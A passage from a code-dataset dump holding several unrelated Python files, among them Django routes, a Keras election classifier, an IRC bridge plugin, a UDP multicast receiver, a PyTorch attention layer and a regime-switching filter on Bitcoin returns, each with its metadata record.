cls.DEFAULTS[\"url\"]\n\n @classmethod\n def get_repo_url(cls):\n \"\"\"\n Return tower's URL\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"repo_url\")\n except KeyError:\n return cls.DEFAULTS[\"repo_url\"]\n\n @classmethod\n def get_installation_name(cls):\n \"\"\"\n Return tower's installation name\n :return:\n \"\"\"\n try:\n return Settings.get_item(\"installation_name\")\n except KeyError:\n return cls.DEFAULTS[\"installation_name\"]\n","sub_path":"tower/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244345167","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\n\ndef gridcreate(name, y, x, ratio, z, **kwargs):\n # Function that creates a blank axis canvas; each figure gets a name (or alternatively a number\n # if none is given), and gridspec creates an N*M grid onto which you can create axes for plots.\n # This returns a gridspec \"instance\" so you can specific which figure to put the axis on if you\n # have several on the go.\n plt.figure(name, figsize=(z*x, z*ratio*y))\n gs = gridspec.GridSpec(y, x, **kwargs)\n return gs\n\n\ntimes = np.loadtxt('v1v2_aperture_transit_times.txt')\ntimes = times[1:]\nt0 = 2454983.8617\np = 2.6940511\norbits = [1000, 1035, 1041, 1243, 1244]\nt_s = [2457772.20477, 2457788.36879]\ndt_s = [0.00021, 0.00027]\nt_ir = [57677.410708356 + 2400000.5]\nuvis_bjd_shifts = [8.645056709647179, 8.580875471234322]\n\ngs = gridcreate('123', 1, 2, 0.8, 5)\nax = plt.subplot(gs[0])\n\nfor i, (orbit, c) in enumerate(zip(orbits, ['k', 'k', 'k', 'k', 'r'])):\n if orbit < 1030:\n t_emp = t0 + orbit * p\n ax.plot(orbit, (t_ir[i] - t_emp)*24*60, c=c, marker='s')\n elif orbit < 1200:\n t_emp = t0 + orbit * p\n ax.errorbar(orbit, (t_s[i-1] - t_emp)*24*60, yerr=dt_s[i-1]*24*60, c=c, marker='s')\n else:\n t_emp = t0 + orbit * p\n t = times[:, 2*(i-3)+1] + 2400000.5\n dt = times[:, 2*(i-3)+2]\n ap = times[:, 0]\n ap_ms = (30-10) * (ap - np.amin(ap)) / (np.amax(ap) - np.amin(ap))\n ax.errorbar(np.ones_like(t)*orbit, (t - t_emp)*24*60 + uvis_bjd_shifts[i-3], yerr=dt*24*60, c=c, ls='None', marker='.')\n\nax.axhline(0, ls='-', c='k')\n_x = 1010\nax.text(_x, -1, 't0 = {}'.format(t0), fontsize=6)\nax.text(_x, -1.25, 'p = {}'.format(p), fontsize=6)\nax.text(_x, -1.5, 'orbit numbers = {}'.format(orbits), fontsize=6)\nax.text(_x, -1.75, 'Spitzer times = {} d'.format(t_s), fontsize=6)\nax.text(_x, -2, 'Spitzer uncertainties = {} d'.format(dt_s), fontsize=6)\nax.text(_x, -2.25, 'UVIS median times = [{}, {}] d'.format(np.percentile(times[:, 1], 50),\n np.percentile(times[:, 3], 50)),\n fontsize=6)\nax.text(_x, -2.5, 'UVIS median uncertainties = [{}, {}] d'.format(np.percentile(times[:, 2], 50),\n np.percentile(times[:, 4], 50)),\n fontsize=6)\nax.set_xlabel('Orbit Number')\nax.set_ylabel('O - C (mins)')\n\nax = plt.subplot(gs[1])\nfor i, c in enumerate(['k', 'r']):\n t_emp = t0 + orbits[i+3] * p\n t = times[:, 2*i+1] + 2400000.5\n dt = times[:, 2*i+2]\n ap = times[:, 0]\n ax.errorbar(ap, (t - t_emp)*24*60 + uvis_bjd_shifts[i], yerr=dt*24*60, c=c, ls='None',\n marker='.', label='V{}'.format(i+1))\nax.legend()\nax.set_xlabel('Aperture size')\nax.set_ylabel('O - C (min)')\n\nplt.tight_layout()\nplt.savefig('transit_times.pdf')\n","sub_path":"transit_times.py","file_name":"transit_times.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181097994","text":"# from django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom . import views\nfrom .views import (ListingListView,\n ListingDetailView,\n ListingCreateView,\n ListingUpdateView,\n ListingDeleteView,\n RequestListView,\n RequestDetailView,\n RequestCreateView,\n RequestUpdateView,\n RequestDeleteView,\n )\n\nurlpatterns = [\n path('', views.home, name = 'flitting-home'),\n path('register/', views.register, name = 'flitting-register'),\n path('login/',auth_views.LoginView.as_view(template_name='flitting/login.html'), name='login'),\n path('logout/',auth_views.LogoutView.as_view(template_name='flitting/logout.html'), name='logout'),\n path('profile/',views.profile, name = \"flitting-profile\"),\n path('team/', views.team, name = 'flitting-team'),\n path('user/', views.user, name = 'flitting-user'),\n path('about/', views.about, name = 'flitting-about'),\n path('listing/', ListingListView.as_view(), name = 'listing-home'),\n path('listing//', ListingDetailView.as_view(), name = 'listing-detail'),\n path('listing/new/', ListingCreateView.as_view(), name = 'listing-create'),\n path('listing//update/', ListingUpdateView.as_view(), name = 'listing-update'),\n path('listing//delete/', ListingDeleteView.as_view(), name = 'listing-delete'),\n path('request/', RequestListView.as_view(), name = 'request-home'),\n path('request//', RequestDetailView.as_view(), name = 'request-detail'),\n path('request/new/', RequestCreateView.as_view(success_url=\"/flitting/request/\"), name = 'request-create'),\n path('request//update/', RequestUpdateView.as_view(success_url=\"/flitting/request/\"), name = 'request-update'),\n path('request//delete/', RequestDeleteView.as_view(success_url=\"/flitting/request/\"), name = 'request-delete'),\n path('request/search', views.RequestSearchList, name = 'request-search'),\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"Flitting/flitting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"28007442","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n#from keras.utils.vis_utils import plot_model\n\nnp.random.seed(100)\ntf.random.set_random_seed(94)\nnumber_train_epochs = 10000\n\n\nhouse = pd.read_pickle(\"./data/preprocessed_house.pkl\")\n\n# Make simple Preprocessing split\nX_train, X_test, y_train, y_test = train_test_split(house.loc[:, house.columns != \"winner\"], house[\"winner\"], test_size = 0.1, random_state = 100)\n\n# Basic Model\nmodel = keras.Sequential([keras.layers.Dense(40, activation=tf.nn.sigmoid),\n keras.layers.Dense(20, activation=tf.nn.sigmoid),\n keras.layers.Dense(2, activation=tf.nn.softmax)])\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n\n\n# Perform Early Stopping Approach\n\n# 1st iteration\nmodel.fit(X_train.to_numpy(), y_train.to_numpy(), epochs=1)\ntrain_loss, train_acc = model.evaluate(X_train.to_numpy(), y_train.to_numpy())\ntest_loss, test_acc = model.evaluate(X_test.to_numpy(), y_test.to_numpy())\nloss_df = pd.DataFrame({'Training Loss':[train_loss],'Testing Loss':[test_loss]})\n\nmodel.save(\"./models/simple_%s.h5\" % number_train_epochs)\noptimal_model_test_loss = test_loss\noptimal_model_epoch_num = 0\n\nfor i in range(1, number_train_epochs): # Already performed 0th iteration\n # Backward propagate once, adjust weights\n model.fit(X_train.to_numpy(), y_train.to_numpy(), epochs=1)\n \n # Forward propagate to calculate new errors on training and testing\n train_loss, train_acc = model.evaluate(X_train.to_numpy(), y_train.to_numpy())\n test_loss, test_acc = model.evaluate(X_test.to_numpy(), y_test.to_numpy())\n new_loss = pd.DataFrame({'Training Loss':[train_loss],'Testing Loss':[test_loss]})\n loss_df = pd.concat([loss_df,new_loss]).reset_index(drop=True)\n \n if (test_loss < optimal_model_test_loss):\n print(\"Updating Optimal model at %dth iteration\" % i)\n model.save(\"./models/simple_%s.h5\" % number_train_epochs)\n optimal_model_test_loss = test_loss\n optimal_model_epoch_num = i\n\n# Plot the Training and Testing Errors over number of epochs\nepochs = tuple(range(number_train_epochs))\n\nfig = plt.figure()\n\nfig.suptitle(\"Loss on Normalized Data over Number of Propagations (Epochs)\")\n\nplt.subplot(1, 2, 1)\nplt.plot(epochs, loss_df[\"Training Loss\"])\nplt.axvline(x=optimal_model_epoch_num, color = 'black')\nplt.title('Training Loss over %d Epochs' % number_train_epochs)\nplt.xlabel('Epoch')\nplt.ylabel('Training Loss')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs, loss_df[\"Testing Loss\"], color = 'r')\nplt.axvline(x=optimal_model_epoch_num, color = 'black')\nplt.title('Testing Loss over %d Epochs' % number_train_epochs)\nplt.xlabel('Epoch')\nplt.ylabel('Training Loss')\n\nplt.savefig(\"./plots/Simple_Loss_%s.png\" % number_train_epochs)\nplt.show()\n\n\n# Examine Error\noptimal_model = keras.models.load_model(\"./models/simple_%s.h5\" % number_train_epochs)\n\ntest_loss, test_acc = optimal_model.evaluate(X_test.to_numpy(), y_test.to_numpy())\nprint('Quick testing accuracy:', test_acc)\n\n# Confusion Matricies\nclassify_pred = lambda x: x > 0.5\n\ntest_predictions = optimal_model.predict(X_test.to_numpy())\ny_test_pred = classify_pred(test_predictions[:,1])\ntest_cm = confusion_matrix(y_test.to_numpy(), y_test_pred)\nprint(\"Testing Confustion Matrix:\\n\", test_cm)\n\ntrain_predictions = optimal_model.predict(X_train.to_numpy())\ny_train_pred = classify_pred(train_predictions[:,1])\ntrain_cm = confusion_matrix(y_train.to_numpy(), y_train_pred)\nprint(\"Training Confustion Matrix:\\n\", train_cm)\n\n\n# Plot Predictions and actual results on a 2D plot of Total Contributions vs Operating Expenditures\nplt.clf()\nfig = plt.figure()\nfig.suptitle(\"Real Election Outcomes vs Simple Predicted Model of Simple Test Set\")\n\nplt.subplot(1, 2, 1)\nplt.scatter(X_test[\"ope_exp\"][y_test], X_test[\"net_con\"][y_test], alpha = 0.5, label = \"Election Win\")\nplt.scatter(X_test[\"ope_exp\"][~y_test], X_test[\"net_con\"][~y_test], color = 'r', alpha = 0.5, label = \"Election Loss\")\nplt.title('Actual Testing Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.legend()\n\nplt.subplot(1, 2, 2)\nplt.scatter(X_test[\"ope_exp\"][y_test_pred], X_test[\"net_con\"][y_test_pred], alpha = 0.5, label = \"Predicted Election Win\")\nplt.scatter(X_test[\"ope_exp\"][~y_test_pred], X_test[\"net_con\"][~y_test_pred], color = 'r', alpha = 0.5, label = \"Predicted Election Loss\")\nplt.title('Neural Network Predictions of Testing Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.legend()\n\nplt.savefig(\"./plots/Simple_Classifications_%s.png\" % number_train_epochs)\n\nincorrect_pred = np.array(y_test_pred != y_test)\n\nplt.clf()\nplt.scatter(X_test[\"ope_exp\"][incorrect_pred], X_test[\"net_con\"][incorrect_pred], alpha = 0.5, color = 'r')\nplt.title('Misclassified Data Points by Normalized ANN of Simple Test Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.show()\nplt.savefig(\"./plots/Simple_Misclassified_%s.png\" % number_train_epochs)\n","sub_path":"01_Simple.py","file_name":"01_Simple.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"48807539","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport random\nfrom numpy import loadtxt,savetxt,zeros\nimport math\nimport seaborn as sns\nfrom scipy import interpolate\nfrom scipy.interpolate import interp2d\n\ni=1\ncc='2'\ncomp=11\n\nsclass=[0.0103,0.266,1,3]\n\ndef s_classification(s):\n ans=np.zeros(len(s))\n for i in range(len(s)):\n if s[i]<=0.266:\n ans[i]=4\n elif s[i]<=1 and s[i]>0.266:\n ans[i]=3\n elif s[i]<=3 and s[i]>1:\n ans[i]=2\n elif s[i]>3:\n ans[i]=1\n return ans\nll=[]\ny=[]\nfor i in range(34):\n y.append(np.loadtxt(open('y_split%d'%(i+1),\"rb\"),delimiter=\" \",skiprows=0)[:,11])\n ll.append(np.loadtxt(open('l_split%d'%(i+1),\"rb\"),delimiter=\" \",skiprows=0)[:,2])\n \ny= np.asarray(y)\nl=np.asarray(ll)\ny=np.reshape(y,[y.shape[0]*y.shape[1],1])\naa=s_classification(y)\nl=np.reshape(l,[y.shape[0]*y.shape[1],1])\n#np.savetxt('ss_con',aa)\n#np.savetxt('ss_local',l)\ns3=aa==3\ns4=aa==4\nfin1=l[s4]\nsns.distplot(fin1)\ns1=aa==1\ns2=aa==2\nfin2=l[s3]\nsns.distplot(fin2)\nnp.savetxt('s4.txt',fin1)\nnp.savetxt('s3.txt',fin2)\n\n","sub_path":"map_data/type_con.py","file_name":"type_con.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"435731800","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/otfbot/plugins/ircServer/human.py\n# Compiled at: 2011-04-22 06:35:42\nfrom twisted.internet import protocol, reactor\nfrom twisted.words.protocols import irc\nfrom twisted.words import service\nfrom twisted.protocols import basic\nfrom otfbot.lib import chatMod\nfrom otfbot.lib.pluginSupport.decorators import callback\nimport string\n\ndef sendNames(server, network, channel):\n getClient = lambda network: server.root.getServiceNamed('ircClient').namedServices[network].factory.protocol\n if network in server.root.getServiceNamed('ircClient').namedServices.keys():\n ircClient = server.root.getServiceNamed('ircClient')\n users = ircClient.namedServices[network].factory.protocol.getUsers(channel)\n names = [ user.nick for user in users ]\n server.names(server.name, '#' + network + '-' + channel, names)\n\n\nclass Plugin(chatMod.chatMod):\n\n def __init__(self, server):\n server.depends_on_service('ircClient')\n self.server = server\n self.mychannels = []\n self.first = True\n self.getClient = lambda network: server.root.getServiceNamed('ircClient').getServiceNamed(network).protocol\n self.getClientNames = lambda : [ connection.name for connection in self.server.root.getServiceNamed('ircClient').services ]\n self.server.registerCallback(self, 'irc_NICK')\n self.server.registerCallback(self, 'irc_PRIVMSG')\n self.server.registerCallback(self, 'irc_JOIN')\n self.server.registerCallback(self, 'irc_PART')\n\n @callback\n def irc_NICK(self, prefix, params):\n if not self.first:\n return\n if not self.server.loggedon:\n return\n self.first = False\n for network in self.getClientNames():\n bot = self.getClient(network)\n for channel in bot.channels:\n self.server.join(self.server.getHostmask(), '#' + network + '-' + channel)\n sendNames(self.server, network, channel)\n self.mychannels.append('#' + network + '-' + channel)\n\n @callback\n def irc_PRIVMSG(self, prefix, params):\n if params[0][0] == '#':\n if params[0] in self.mychannels:\n (network, channel) = params[0][1:].split('-', 1)\n self.getClient(network).sendmsg(channel, params[1])\n elif '-' in params[0]:\n (network, nick) = params[0].split('-', 1)\n self.getClient(network).sendmsg(nick, params[1])\n\n @callback\n def irc_JOIN(self, prefix, params):\n try:\n (network, channel) = params[0][1:].split('-', 1)\n if network in self.getClientNames():\n if len(params) >= 2:\n self.server.root.getServiceNamed('config').set('password', params[1], 'main', network, channel)\n self.getClient(network).join(channel, params[1])\n else:\n self.getClient(network).join(channel)\n self.server.join(self.server.getHostmask(), '#%s-%s' % (network, channel))\n if channel in self.getClient(network).users.keys():\n sendNames(self.server, network, channel)\n self.mychannels.append('#%s-%s' % (network, channel))\n except ValueError:\n pass\n\n @callback\n def irc_PART(self, prefix, params):\n try:\n (network, channel) = params[0][1:].split('-', 1)\n if network in self.getClientNames():\n self.getClient(network).part(channel)\n self.server.part(self.server.getHostmask(), '#%s-%s' % (network, channel))\n self.mychannels.remove('#%s-%s' % (network, channel))\n except ValueError:\n pass","sub_path":"pycfiles/otfbot-1.0.0-py2.6/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"366393935","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('assets', '0005_assetholder'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BudgetInfo',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(verbose_name='name', max_length=255, unique=True)),\n ('created', models.DateTimeField(verbose_name='date created', auto_now=True)),\n ('modified', models.DateTimeField(verbose_name='last modified', auto_now_add=True)),\n ],\n options={\n 'verbose_name_plural': 'Budgets info',\n 'verbose_name': 'Budget info',\n },\n ),\n migrations.AddField(\n model_name='asset',\n name='budget_info',\n field=models.ForeignKey(null=True, to='assets.BudgetInfo', blank=True, on_delete=django.db.models.deletion.PROTECT, default=None),\n ),\n ]\n","sub_path":"src/ralph/assets/migrations/0006_auto_20151110_1448.py","file_name":"0006_auto_20151110_1448.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"414812475","text":"# printing the number of digits present in a given number\nnum_str = input(\"Enter a number: \")\nnum = int(num_str)\n# print(type(num))\n# print(len(num))\nx = len(num_str)\n\n\n# initialize sum\nsum = 0\n\n# find the sum of the cube of each digit\ntemp = num\nwhile temp > 0:\n digit = temp % 10\n sum += digit ** x\n temp //= 10\n\n# display the result\nif num == sum:\n print(num, \"is an Armstrong number\")\nelse:\n print(num, \"is not an Armstrong number\")\n","sub_path":"Basic python codes/ArmstrongFinal.py","file_name":"ArmstrongFinal.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"325618506","text":"import unittest\nimport os\nimport sys\nfrom . import autoparse\nfrom . import constants as c\n\n\ntry:\n from pylib.config.config import read_config\nexcept ModuleNotFoundError as e:\n thisdir = os.path.dirname(__file__)\n homepath = os.path.abspath( os.path.join(thisdir, '..'))\n sys.path.append(homepath)\n from config.config import read_config \n\nCONFIG_FILE = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"test\", \"test_config.json\"))\nconfig = read_config(CONFIG_FILE)\n\nclass TestArg(unittest.TestCase):\n def test_valid_config(self):\n args = autoparse.config_parser(config)\n self.assertEqual(args.testarg, \"default value\")\n\n def test_invalid_config(self):\n with self.assertRaises(ValueError):\n autoparse.config_parser({})\n\n def test_null_config(self):\n d = {c.ARGPARSE_SECTION_KEY:{}}\n args = autoparse.config_parser(d)\n self.assertEqual(args, {})\n\n\nif __name__=='__main__':\n unittest.main()\n","sub_path":"pylib/autoparse/test_autoparse.py","file_name":"test_autoparse.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489815218","text":"import argparse\nimport json\nimport os\nfrom tqdm import tqdm\n# 3rd party imports\nimport spacy\nimport neuralcoref\nimport sys\nfrom collections import defaultdict\nfrom main02_parse_articles import parse_article\nfrom main03_get_parse_data import extract_pdata\nfrom main04_compute_auth import combine_auth, compute_statement_auth\nimport pandas as pd\n\npd.options.mode.chained_assignment = None # default='warn'\n\nclass Pipeline():\n\tdef __init__(self, args):\n\t\tself.args = args\n\t\tos.makedirs(self.args.output_directory, exist_ok=True)\n\t\tself.nlp = spacy.load('en_core_web_sm', disable=[\"ner\"])\n\t\tneuralcoref.add_to_pipe(self.nlp)\n\n\tdef parse_articles(self):\n\t\tfor filename in tqdm(os.listdir(args.input_directory)):\n\t\t\tparse_article(filename, self.nlp, self.args)\n\n\tdef extract_parsed_data(self):\n\t\textract_pdata(self.args)\n\n\tdef compute_authority_measures(self):\n\t\tchunks = os.listdir(os.path.join(self.args.output_directory, \"03_pdata\"))\n\t\tchunks = sorted(chunks, key=lambda x: int(x.split(\"_\")[-1][:-4]))\n\t\tfor filename in tqdm(chunks):\n\t\t\tfilepath = os.path.join(self.args.output_directory, \"03_pdata\", filename)\n\t\t\tcur_df = pd.read_pickle(filepath)\n\t\t\tcompute_statement_auth(self.args, cur_df, filename)\n\t\tcombine_auth(self.args)\n\n\tdef run_main(self):\n\t\t# dependency parsing\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"02_parsed_articles\"), exist_ok=True)\n\t\tself.parse_articles()\n\n\t\t# extract necessary parsed information\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"03_pdata\"), exist_ok=True)\n\t\tself.extract_parsed_data()\n\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"04_auth\"), exist_ok=True)\n\n\t\t# compute authority measures for chunks\n\t\tself.compute_authority_measures()\n\n\n\t\t\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--input_directory\", type=str, default=\"\")\n\tparser.add_argument(\"--output_directory\", type=str, default=\"\")\n\targs = parser.parse_args()\n\tpipeline = Pipeline(args)\n\tpipeline.run_main()\n\n\n","sub_path":"src/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211850515","text":"import torch\nimport torch.nn as nn\nimport sys\nfrom torch.autograd import Variable\n\nclass Attention(nn.Module):\n\n def __init__(self, hidden_dim):\n super(Attention, self).__init__()\n self.hidden_dim = hidden_dim\n \"\"\"\n self.attn = nn.Sequential(\n nn.Linear(self.hidden_dim*2, 1, bias=True),\n nn.Softmax()\n )\n \"\"\"\n self.linear1 = nn.Linear(self.hidden_dim*2, 1, bias=False)\n self.softmax = nn.Softmax(dim=2)\n\n\n def forward(self, hidden, encoder_output, device):\n concatenated_attn = torch.cat((hidden, encoder_output), dim=2).to(device)\n #attn_weights = self.attn(concatenated_attn)\n batch_size = concatenated_attn.size()[1]\n concatenated_attn = concatenated_attn.view(-1, concatenated_attn.size()[2])\n attn_weights = self.linear1(concatenated_attn)\n attn_weights = attn_weights.view(-1, batch_size, 1)\n attn_weights = torch.transpose(attn_weights, 0, 2)\n attn_weights = torch.transpose(attn_weights, 0, 1)\n attn_weights = self.softmax(attn_weights)\n #print(attn_weights.size())\n #print(attn_weights)\n encoder_output = torch.transpose(encoder_output, 0, 1)\n #attn_hidden = Variable(torch.bmm(attn_weights.type(torch.FloatTensor).to(device), encoder_output.type(torch.FloatTensor))).to(device)\n attn_hidden = torch.bmm(attn_weights, encoder_output)\n attn_hidden = Variable(torch.squeeze(attn_hidden)).to(device)\n #attn_hidden = torch.squeeze(attn_hidden)\n return attn_hidden\n","sub_path":"model/attn.py","file_name":"attn.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106717642","text":"#\n# https://www.cnblogs.com/lsdb/p/9408947.html\n#\n\nimport sys\nimport struct\nimport time\nimport socket\n\n# linux能绑定网卡这里绑定组播IP地址不会服错,windows没法绑定网卡这里不能绑定组播IP地址只能绑定本网卡IP地址\nif \"linux\" in sys.platform:\n # 绑定到的网卡名,如果自己的不是eth0则注意修改\n nic_name = b\"ens37\"\n # 监听的组播地址\n mcast_group_ip = \"239.255.255.250\"\nelse:\n mcast_group_ip = socket.gethostbyname(socket.gethostname())\nmcast_group_port = 1900\n\ndef receiver():\n # 建立接收socket,和正常UDP数据包没区别\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n # 25是linux上的socket.SO_BINDTODEVICE的宏定义,但由于windows没实现SO_BINDTODEVICE,所以python索性也就没有实现SO_BINDTODEVICE,我们直接使用25\n # windows没有实现SO_BINDTODEVICE,所以不能通过这种方式绑定网卡,windows怎么实现绑定网卡暂不清楚\n if \"linux\" in sys.platform:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, nic_name)\n # linux能绑定网卡这里绑定组播IP地址不会服错,windows没法绑定网卡这里不能绑定组播IP地址只能绑定本网卡IP地址\n sock.bind((mcast_group_ip, mcast_group_port))\n # 加入组播组\n mreq = struct.pack(\"=4sl\", socket.inet_aton(mcast_group_ip), socket.INADDR_ANY)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n # 允许端口复用,看到很多教程都有没想清楚意义是什么,我这里直接注释掉\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # 设置非阻塞,看到很多教程都有也没想清楚有什么用,我这里直接注释掉\n # sock.setblocking(0)\n while True:\n try:\n message, addr = sock.recvfrom(1024)\n print(f'\\033[0;32m{time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())}: Receive data from {addr}: \\033[0m\\n{message.decode()}')\n except KeyboardInterrupt:\n break\n except Exception as e:\n print(f\"while receive message error occur {type(e)}\")\n\n\nif __name__ == \"__main__\":\n receiver()","sub_path":"python/network/udp_group_multicast_server.py","file_name":"udp_group_multicast_server.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"303490182","text":"import numpy as np\nfrom filtering import *\nfrom smoother import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom class_p import *\n\ndf = pd.read_csv(r'/Users/paulcalvetti/Documents/internship/exos/btcusd_15m/bctusd_15m_all.csv')\ndf['time'] = pd.to_datetime(df['time'])\ndf.sort_values(by = 'time', inplace=True)\ndf.set_index('time')\n\nidx = (df.time >= '2015-02-20') & (df.time <= '2015-03-01')\n#df2 = df[df['time'] > '2016-01-01' and df['time'] < '2017-01-01' ]\ndf2 = df[idx]\nprint('here df2',df2)\n\n\n\n\nV = np.array([df2['log return'].tolist()])\n#print(np.shape(V))\nplt.plot(df2.time,V[0])\nplt.xticks(rotation=70)\nplt.title(\"BTCUSD Log Returns\")\nplt.show()\nmean_val = np.mean(V)\nprint('mean_val',mean_val)\nS = 4\nT=np.size(V)\n\n\nmu1h = np.empty(shape = [S,1],dtype = object)\nmu1h[0] = np.array([[mean_val]])\nmu1h[1] = np.array([[mean_val]])\nmu1h[2] = np.array([[mean_val]])\nmu1h[3] = np.array([[mean_val]])\n\nsig0v_low = .000005\nsig0v_high = .0001\nsig0v = [sig0v_low,sig0v_high,sig0v_low, sig0v_high]\n\n\nsig1h_low = .000000001\nsig1h_high = .00001\n\nsig1h = np.empty(shape = [S,1,1],dtype = object)\nsig1h[0] = np.array([[sig1h_low]])\nsig1h[1] = np.array([[sig1h_low]])\nsig1h[2] = np.array([[sig1h_high]])\nsig1h[3] = np.array([[sig1h_high]])\n\nsig0h_low = .000000001\nsig0h_high = .00001\n\nsig0h = np.empty(shape = [S,1,1], dtype = object)\n\nsig0h[0] = np.array([[sig0h_low]])\nsig0h[1] = np.array([[sig0h_low]])\nsig0h[2] = np.array([[sig0h_high]])\nsig0h[3] = np.array([[sig0h_high]])\n\n\n\npstgstm1ctm1 = np.empty(shape = [S,S,2])\npstgstm1ctm1[:,:,0] = np.array([[0.97, .01, .01, .01],[.01,.97, .01, .01],[.01,.01,.97, .01],[.01,.01,.01,.97]])\npstgstm1ctm1[:,:,1] = np.array([[1, 1.0000e-06, 1.0000e-06, 1.0000e-06],[1.0000e-06, 1, 1.0000e-06,1.0000e-06],[1.0000e-06, 1.0000e-06, 1,1.0000e-06],[1.0000e-06, 1.0000e-06, 1.0000e-06,1]])\n\n\n\n\n\n\n\n\nB0 = np.array([[1], [1], [1],[1]])\nmu0v = [0, 0, 0,0]\n\n\n\nmu0h = np.empty(shape = [S,1],dtype = object)\nmu0h[0] = np.array([[0]])\nmu0h[1] = np.array([[0]])\nmu0h[2] = np.array([[0]])\nmu0h[3] = np.array([[0]])\n\n\n\n\n\n\n\n\n\n\nA = np.empty(shape = [S,1,1], dtype = object)\n\nA[0] = np.array([[1]])\nA[1] = np.array([[1]])\nA[2] = np.array([[1]])\nA[3] = np.array([[1]])\n\nB1 = np.empty(shape = [S,1],dtype = object)\nB1[0] = np.array([[1]])\nB1[1] = np.array([[1]])\nB1[2] = np.array([[1]])\nB1[3] = np.array([[1]])\n\nmu1v = np.zeros(S)\nsig1v = np.array([.00001,.00001,.00001,.00001])\n\n\n\n\n\n\n\n\n\n\nps1 = np.array([[1/S, 1/S, 1/S,1/S]])\n\n\nmuh1 = np.empty(shape = [S,1],dtype = object)\nmuh1[0] = np.array([[0]])\nmuh1[1] = np.array([[0]])\nmuh1[2] = np.array([[0]])\nmuh1[3] = np.array([[0]])\n\nsigh1 = np.empty(shape = [S,1,1])\nsigh1[0] = np.array([[.000001]])\nsigh1[1] = np.array([[.0000001]])\nsigh1[2] = np.array([[.0000001]])\nsigh1[3] = np.array([[.0000001]])\n\n\n\n\n\n\n\n\np = P(B0, mu0v,sig0v,mu0h,sig0h,A,B1,mu1v,sig1v,mu1h,sig1h,pstgstm1ctm1,ps1,muh1,sigh1)\n\nf, F, w, alpha, loglik, reset_prob = filtering(p,V,5)\n\ns0 =[]\ns1=[]\ns2=[]\ns3=[]\nfor t in range(T):\n s0.append(sum(w[t][0]))\n s1.append(sum(w[t][1]))\n s2.append(sum(w[t][2]))\n s3.append(sum(w[t][3]))\n\n\nprint('here',np.array(s0)+np.array(s1)+np.array(s2))\ns0=np.array(s0)\ns1=np.array(s1)\n\ns2=np.array(s2)\ns3=np.array(s3)\n\nplt.bar(range(np.size(s0)), s0,color='g', label='Low Variance, Stable', 